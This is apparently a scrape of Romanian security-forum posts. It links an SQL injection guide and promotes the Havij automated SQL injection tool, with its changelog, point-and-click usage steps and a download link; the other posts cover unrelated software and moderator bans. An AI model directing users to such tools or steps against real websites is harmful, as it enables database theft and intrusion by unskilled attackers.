http://download.microsoft.com/download/9/0/B/90B96800-6765-4AC2-A79F-A2E9116F2157/Moving%20to%20Microsoft%20Visual%20Studio%202010%20ebook.pdf http://download.microsoft.com/download/9/0/B/90B96800-6765-4AC2-A79F-A2E9116F2157/Moving%20to%20Microsoft%20Visual%20Studio%202010%20ebook.xps Book's sample code: http://download.microsoft.com/download/9/0/B/90B96800-6765-4AC2-A79F-A2E9116F2157/Moving%20to%20Microsoft%20Visual%20Studio%202010%20sample%20code.zip Sursa: http://blogs.msdn.com/b/microsoft_press/archive/2010/09/13/free-ebook-moving-to-microsoft-visual-studio-2010.aspx

Quick guide to SQL Injection attacks and defenses Authors: ITSecTeam O parte din articol: A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands. SQL injection is a code injection technique that exploits a security vulnerability occurring in the database layer of an application. .................................................................... Download: http://itsecteam.com/files/Quick%20guide%20to%20SQL%20Injection%20attacks%20and%20defenses%20-%20english.pdf

Am vazut ca sunt multi fani ai acestui program. A aparut aceasta versiune de curand. Havij is an automated SQL Injection tool that helps penetration testers to find and exploit SQL Injection vulnerabilities on a web page. It can take advantage of a vulnerable web application. By using this software user can perform back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running SQL statements and even accessing the underlying file system and executing commands on the operating system. The power of Havij that makes it different from similar tools is its injection methods. The success rate is more than 95% at injectiong vulnerable targets using Havij. The user friendly GUI (Graphical User Interface) of Havij and automated settings and detections makes it easy to use for everyone even amateur users. Havij v1.13 Advanced SQL Injection Tool released. New features of this version are: * Oracle error based database added with ability to execute query. * Getting tables and column when database name is unknown added (mysql) * Another method added for finding columns count and string column in PostgreSQL * Automatic keyword finder optimized and some bugs fixed. * A bug in finding valid string column in mysql fixed. * 'Key is not unique' bug fixed * Getting data starts from row 2 when All in One fails - bug fixed * Run time error when finding keyword fixed. * False table finding in access fixed. * keyword correction method made better * A bug in getting current data base in mssql fixed. * A secondary method added when input value doesn't return a normal page (usually 404 not found) * Data extraction bug in html-encoded pages fixed. * String or integer type detection made better. * A bug in https injection fixed. How to use This tool is for exploiting SQL Injection bugs in web application. For using this tool you should know a little about SQL Injections. Enter target url and select http method then click Analyze. Note: Try to url be valid input that returns a normal page not a 404 or error page. Informatii: http://itsecteam.com/en/projects/project1.htm Descarcare: http://itsecteam.com/files/havij/Havij1.13Free.rar PS: Nu l-am incercat, nu stiu daca e infectat, dar daca il luati de pe site-ul oficial, de la link-ul postat nu cred ca o sa fie probleme.

Cred ca a aparut de curand, daca nu chiar azi. Detalii: http://www.ymessengerblog.com/blog/2010/11/16/introducing-the-new-yahoo-messenger-beta/ Cred ca cea mai mare noutate e integrarea serviciilor Facebook si Twitter. Eu nu l-am incercat, sunt pe Linux, nu ma pot da prea multe detalii. Il puteti descarca de aici: http://messenger.yahoo.com/beta/win

Cea de Stephen King nu? Am citit-o eu, mi-au placut unele idei, e interesanta.

TinKode: Eu chiar m-as bucura daca ai lucra la Google sau o alta firma renumita, in acest domeniu, stiu ca asta iti doresti. Dar nu e chiar asa. Pentesting inseamna retelistica, cunostinte foarte bune de programare (C, ASM -> BOFs) si multe altele.

"Un lucru care vreau s? se ?tie despre mine: eu nu m? consider hacker. Am observat c? mul?i pu?tani se cred a?a (folosesc programe f?cute de al?ii pentru a putea s? sparg? alte site-uri, ei ne?tiind nici m?car cum func?ioneaz? acele aplica?ii – ??tia, mai pe scurt, sunt numi?i "script-kiddies")" +1 Kabron: Nu a mintit. Oricum, cred ca isi face degeaba sperante ca il angajeaza cineva, nu prea se cauta astfel de lucruri, daca se axa pe networking, cryptografie statea altfel treaba.

Cred ca datele urmau sa ajunga la: lx.8@hotmail.com. In fine, era infectat, ban permanent, mutat la gunoi.

Testat TV-MAXE pe Mandriva, merge perfect, felicitarile mele autorului.

Nici nu a trebuit sa citesc ce contine acest topic sa imi dau seama ca locul sau este la Gunoi. Nu am descarcat ce ai postat tu, dar titlul spune totul. Ban permanent.